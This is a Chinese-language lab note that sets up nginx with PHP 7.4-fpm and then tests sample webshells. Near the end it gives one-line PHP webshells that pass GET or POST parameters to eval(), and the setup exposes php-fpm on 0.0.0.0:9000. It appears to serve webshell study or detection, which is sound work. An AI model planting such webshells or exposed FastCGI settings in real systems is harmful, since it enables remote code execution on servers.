环境安装
安装php和nginx,不再赘述
apt-get update
apt-get install nginx
这里我的版本是php7.4
# php -v
PHP 7.4.33 (cli) (built: Jan 6 2023 16:10:36) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
with Zend OPcache v7.4.33, Copyright (c), by Zend Technologies
查看nginx是否启动
# systemctl status nginx
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
Active: active (running) since Wed 2023-01-11 14:32:41 CST; 48min ago
修改配置文件
修改php-fpm的配置文件:
vim /etc/php/7.4/fpm/pool.d/www.conf
listen = /run/php/php7.4-fpm.sock
listen = 0.0.0.0:9000
在/etc/nginx/conf.d目录下新建default.conf,文件内容如下:
server {
listen 80;
listen [::]:80;
server_name localhost 127.0.0.1;
access_log /var/log/nginx/host.access.log;
location / {
root /var/www/html;
index index.php index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
root /var/www/html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi.conf;
}
}
重启php-fpm和nginx;
service nginx restart
service php7.4-fpm restart
测试样本
在/var/www/html目录下创建如下代码:
<?php
phpinfo();
?>
使用curl请求页面:
curl 127.0.0.1
查看是否有phpinfo的回显;
环境可以解析php样本,测试成功。
下面测试几个样本:
Get传参
<?php
eval($_GET['cmd']);
?>
Post传参
<?php
eval($_POST['cmd']);
?>
preg_replace调试不成功,原因:php7版本废除/e模式,无法命令执行
